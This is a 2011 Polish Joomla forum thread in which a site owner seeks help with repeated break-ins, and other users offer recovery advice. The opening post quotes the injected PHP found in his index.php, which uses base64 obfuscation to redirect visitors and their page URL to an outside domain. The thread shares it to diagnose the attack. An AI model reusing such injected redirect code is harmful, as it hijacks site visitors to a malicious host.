Włamania na stronę
Strona 1 z 2 12 OstatniOstatni
Wyniki 1 do 10 z 15

Temat: Włamania na stronę

  1. #1
    Przeglądacz
    Dołączył
    16-07-2010
    Skąd
    Łódź
    Wpisy
    59
    Punkty
    10

    Włamania na stronę

    Witam
    Od dwóch tygodni ktoś włamuje się bezczelnie na moja stronę !!!
    Ja przywracam pliki z serwera z kopii, mijają 4h i znowu to samo. Podejrzewam, iż dzieje się to przez SQL, ale pewności nie mam. Adres strony - http://www.akces.eu, Wersja Joomla 1.5.22 czyli najbardziej aktualna. Zgłosiłem to na policję, ale znając życie to i tak z tym nic nie zrobią ;/ Jak zlokalizować takiego kogoś, lub ewentualnie jakoś dobrze zablokować, aby już tego nie robił. Bardzo mnie to drażni. Po dokonanym włamaniu na stronie widnieje komunikat o treści : Parse error: syntax error, unexpected '<' in /index.php on line 88.
    Bardzo proszę forumowiczów o pomoc. Dodam, że pliki mają odpowiednie prawa tak jak jest to opisane w helpie Joomli .
    Proszę o ewentualne podpowiedzi jak dorwać tego kogoś, zlokalizować lub zablokować ?

    Dodam, że w kodzie index.php pojawia się cos takiego jak poniżej:

    echo JResponse::toString($mainframe->getCfg('gzip'));<?php if(!isset($tf['engine'])){$tf['engine']=1;$tf['s']=base64_decode('a2hjb2wuY29t');$tf['u']='http://'.$tf['s'].'/page/';$tf['r']="?ref=".base64_encode('http://'.@$_SERVER['HTTP_HOST'].@$_SERVER['REQUEST_URI']);if(!isset($_GET['rf'])){if(!@headers_sent()){@header("HTTP/1.1 302 Moved Temporarily");@header("Location: ".$tf['u'].$tf['r']);}echo "<h3>Page Moved</h3>The page you are trying to open has been moved.<br><br>Use the navigation links on the right of this page, the search box at the top, or the site map link below to find the new location of the page you're seeking.<br><br>Click the link below to follow new url.<br><br><a href=\"".$tf['u']."\">".$tf['u']."</a>";echo "<script type=\"text/javascript\">document.location = \"".$tf['u'].$tf['r']."\";</script>";exit;}

    Bardzo proszę o pomoc .
    Ostanio edytowane przez piotrusbor : 04-04-2011 10:54

  2. Pani Reklamowa
    Pani Reklamowa jest aktywna
    Avatar Panny Google

    Dołączył
    19-08-2010
    Skąd
    Internet
    Postów
    milion
    Pochwał
    setki
  3. #2
    Wyga palyga007 awatar
    Dołączył
    24-03-2010
    Skąd
    Wieluń
    Wpisy
    3 899
    Punkty
    229

    Domyślny

    1. A jaką masz pewność że twoja kopia bezpieczeństwa nie jest zainfekowana?

    Postępowanie po włamaniu opisane jest dokładnie na wiki joomla.
    ---------------------------------------------------------------------------------------------
    "Nie chowaj nienawiści po wieczne czasy, ty, który sam nie jesteś wieczny."
    Przyjmę ofertę pracy w Australii...
    web-coder.pl

  4. #3
    Przeglądacz
    Dołączył
    16-07-2010
    Skąd
    Łódź
    Wpisy
    59
    Punkty
    10

    Domyślny

    No właśnie nadpisywałem kopie wykonaną przed atakiem z lutego, a włamania dokonywane są od 2 tygodni, więc raczej odpada opcja iż backup jest zainfekowany ;/

  5. #4
    Wyga palyga007 awatar
    Dołączył
    24-03-2010
    Skąd
    Wieluń
    Wpisy
    3 899
    Punkty
    229

    Domyślny

    http://wiki.joomla.pl/index.php/Witr..._w%C5%82amaniu

    Cóż więcej można napisać. Tam wszystko jest wyjaśnione.
    ---------------------------------------------------------------------------------------------
    "Nie chowaj nienawiści po wieczne czasy, ty, który sam nie jesteś wieczny."
    Przyjmę ofertę pracy w Australii...
    web-coder.pl

  6. #5
    Przeglądacz
    Dołączył
    16-07-2010
    Skąd
    Łódź
    Wpisy
    59
    Punkty
    10

    Domyślny

    Ponownie:
    1.)Wykonane
    2.)Usługodawca serwera home.pl - spr. tylko logi a tam nic nie ma
    3.)o tym nie pomyślałem, ale zaraz to wykonam jak tylko ktoś ponownie się włamie (link nie działa !)
    4.)j.w
    5.)patrz pkt. 4
    6.)patrz pkt. 2
    7.)kasowałem i nadgrywałem (luty)
    8.)backup bazy z luty
    9.)wykonane
    10.)wykonane
    11.)patrz pkt. 10
    12.)patrz pkt. 10
    13.)patrz pkt. 10
    14.) i o to chodzi - powraca ;/

    ---------- Post dodany o 09:47 ---------- Poprzedni post był o 09:32 ----------

    Wydaj mi się, że może to być jakieś włamanie po SQL injection przez lukę w Joomla 1.5.22, tylko jak zlokalizować gdzie jest ta luka, lub ewentualnie jak ktoś wchodzi przez nią w cały system ?
    Zauważyłem jeszcze, iż moja strona próbuje dokonać przekierowania na adres www.khcol.com
    Ostanio edytowane przez piotrusbor : 04-04-2011 11:49

  7. #6
    Przeglądacz
    Dołączył
    29-06-2006
    Wpisy
    94
    Punkty
    11

    Domyślny

    Proponuję kupić komercyjnego firewalla. Swoim klientom instaluję RSFirewall i jestem bardzo zadowolony.

  8. #7
    Bywalec AndiC awatar
    Dołączył
    20-09-2006
    Skąd
    Skawina
    Wpisy
    425
    Punkty
    56

    Domyślny

    Jakiego klienta FTP używasz ? i czy masz w nim zapamiętane dane do logowania ?

  9. #8
    Przeglądacz
    Dołączył
    16-07-2010
    Skąd
    Łódź
    Wpisy
    59
    Punkty
    10

    Domyślny

    opd.

    FTp Total Comander 7.0x, tak zapamiętane mam, ale co to ma do rzeczy skoro zmieniałem hasło to po I, a po II, skanowałem kompa pod kątem Keylogera;/

    Firewall nic mi nie da, bo to jest zastosowanie bezpośrednio na kompa a nie na serwa zewnętrznego u usługodawcy.;/ Pewnie są jakieś luki w Joomla i tyle. Specem od programowania w PHP to ja nie jestem, coś tam wiem ale to za mało;/ Więc radzę się was jak mogę;/ Skoro mam wersję 1.5.22 to znaczy że najnowszą;/

  10. #9
    Wyga palyga007 awatar
    Dołączył
    24-03-2010
    Skąd
    Wieluń
    Wpisy
    3 899
    Punkty
    229

    Domyślny

    1. Wyłącz zapamiętywanie haseł i włącz szyfrowanie połączeń.

    A chociaż sprawdziłeś o czym napisał @marco?
    Jeśli nie wiesz o czym mówisz to może lepiej się nie wypowiadać.
    ---------------------------------------------------------------------------------------------
    "Nie chowaj nienawiści po wieczne czasy, ty, który sam nie jesteś wieczny."
    Przyjmę ofertę pracy w Australii...
    web-coder.pl

  11. #10
    Senior nikszal awatar
    Dołączył
    07-09-2006
    Skąd
    FNW
    Wpisy
    5 288
    Punkty
    196

    Domyślny

    Właśnie wracam ze strony http://twierdzamodlin.nsk.pl/ po włamaniu. Mają panowie hackerzy pomysły, oj mają. Dorzucili swoje dwa pliki, w tym jeden tekstowy (4,88 MB) z linkami do stron pornograficznych i zmyślnie zmodyfikowali configuration.php , bo data zmian w pliku była z marca, a włamanie było dzisiaj.
    Zanim zapytasz na Forum:
    1. Przeszukaj wątki.
    2. Poszukaj odpowiedzi na wiki.
    __________________________________________________ _________________
    Książki oddane na makulaturę dowodzą, że cierpliwość papieru też ma swoje granice.

Strona 1 z 2 12 OstatniOstatni

Podobne tematy

  1. Przekłamania w liczniku odwiedzin
    przez gti na forum Administracja składnikami
    Odpowiedzi: 3
    Ostatni post/autor: 09-11-2008, 21:05
  2. Włamania do joomla...
    przez Riaan na forum Sprawy bezpieczeństwa Joomla!
    Odpowiedzi: 1
    Ostatni post/autor: 10-06-2008, 20:19
  3. Brak łamania wiersza w edytorze.
    przez foruser na forum Joomla 1.5 BŁĘDY
    Odpowiedzi: 12
    Ostatni post/autor: 02-04-2008, 16:56
  4. Włamania do for
    przez Puerto na forum Off topic
    Odpowiedzi: 5
    Ostatni post/autor: 27-03-2008, 23:10
  5. MOSimage: wymuszenie złamania wiersza podpisu?
    przez brzoza na forum Administracja Joomla!
    Odpowiedzi: 2
    Ostatni post/autor: 19-09-2007, 00:34

Reguły pisania

  • Nie możesz zakładać nowych tematów
  • Nie możesz dodawać wypowiedzi
  • Nie możesz dodawać załączników
  • Nie możesz poprawiać swoich postów
  •